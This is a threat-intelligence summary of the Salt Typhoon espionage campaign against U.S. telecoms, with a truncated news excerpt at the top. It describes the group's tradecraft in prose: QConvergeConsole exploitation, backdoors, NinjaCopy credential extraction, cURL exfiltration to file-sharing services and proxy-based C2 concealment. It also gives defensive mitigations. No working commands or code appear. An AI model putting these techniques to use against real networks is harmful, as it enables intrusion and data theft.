Full Report
U.S. telecoms giant T-Mobile has confirmed that it was also among the companies that were targeted by Chinese threat actors to gain access to valuable information. The adversaries, tracked as Salt Typhoon, breached the company as part of a "monthslong campaign" designed to harvest cellphone communications of "high-value intelligence targets." It's not clear what information was taken, if any,
Analysis Summary
# Threat Actor: Salt Typhoon
## Attribution & Identity
* **Attribution:** Chinese threat actors, People's Republic of China (PRC)-affiliated.
* **Known Aliases:** Earth Estries, FamousSparrow, GhostEmperor, UNC2286.
* **Associated Groups:** Associated with predecessor malware (HemiGate, Crowdoor) previously used by China-linked group Tropic Trooper.
## Activity Summary
Salt Typhoon has been active since at least 2020. The group conducted a "monthslong campaign" focused on breaching major U.S. telecommunications companies, including T-Mobile, AT&T, Verizon, and Lumen Technologies. The objective of this campaign appears to be cyber espionage, specifically harvesting cellphone communications of "high-value intelligence targets" and stealing customer call records data and private communications of individuals involved in government or political activity. The group was also previously linked to attacks targeting government and technology industries in the Philippines, Taiwan, Malaysia, South Africa, Germany, and the U.S. in August 2023.
## Tactics, Techniques & Procedures
* **Initial Access:** Exploiting vulnerabilities in outside-facing services or remote management utilities (e.g., vulnerable/misconfigured QConvergeConsole installations).
* **Delivery/Payloads:** Delivering malware such as Cobalt Strike, custom stealer TrillClient, and backdoors (HemiGate, Crowdoor, Zingdoor, Snappybee/Deed RAT).
* **Persistence:** Continuously updating tools, employing backdoors, and using scheduled tasks for persistence.
* **Lateral Movement & C2 Concealment:** Utilizing backdoors for lateral movement and credential theft. Repurposing a victim's proxy server to forward traffic to the actual C2 server to conceal malicious traffic.
* **Discovery & Data Staging:** Using PortScan for network discovery and mapping, and NinjaCopy for credential extraction. Data collection done via RAR archiving.
* **Exfiltration:** Using cURL to send archived data to anonymized file-sharing services, employing proxies to hide backdoor traffic.
* **Additional Backdoors Observed:** Cryptmerlin (executes C2 commands) and FuxosDoor (an IIS implant on compromised Exchange Servers to run commands via cmd.exe).
## Targeting
* **Sectors:** Commercial Telecommunications (Telecoms Giants).
* **Geography:** United States primarily, with prior activity noted in the Philippines, Taiwan, Malaysia, South Africa, and Germany.
* **Victims:** T-Mobile, AT&T, Verizon, and Lumen Technologies.
## Tools & Infrastructure
* **Malware Families Used:** Cobalt Strike, TrillClient (custom Go-based stealer), HemiGate, Crowdoor (variant of SparrowDoor), Zingdoor, Snappybee (Deed RAT, suspected ShadowPad successor), Cryptmerlin, FuxosDoor.
* **Utility Tools:** cURL, NinjaCopy, PortScan.
* **Infrastructure:** Command-and-control (C2) servers communicate via anonymous file-sharing services, utilizing proxies to anonymize traffic.
## Implications
Salt Typhoon represents a sophisticated and adaptable cyber espionage threat actor aligned with the PRC. Their sustained targeting of critical U.S. telecommunications infrastructure demonstrates a strategic intent to position themselves for large-scale intelligence collection against high-value government and political targets who use these networks. Their multi-layered strategy, involving blending custom tools, publicly known malware, and defense evasion techniques (like proxy repurposing), makes them difficult to detect and remove.
## Mitigations
* **Patch and Harden:** Focus immediate remediation efforts on external-facing services, especially remote management utilities, to prevent initial access via known vulnerabilities (like QConvergeConsole exploitation).
* **Network Monitoring:** Implement granular monitoring for anomalous outbound traffic, especially connections to anonymized file-sharing services via tools like cURL, as this is a key exfiltration technique.
* **Egress Filtering/Proxy Review:** Scrutinize proxy server configurations for unusual traffic forwarding that might indicate reuse by attackers for C2 concealment.
* **Endpoint Detection:** Deploy robust endpoint detection and response to identify the deployment and execution of the observed bespoke backdoors (TrillClient, Cryptmerlin, FuxosDoor).
* **Credential Protection:** Implement advanced credential monitoring and restrict lateral movement paths, particularly focusing on identifying usage of tools like NinjaCopy.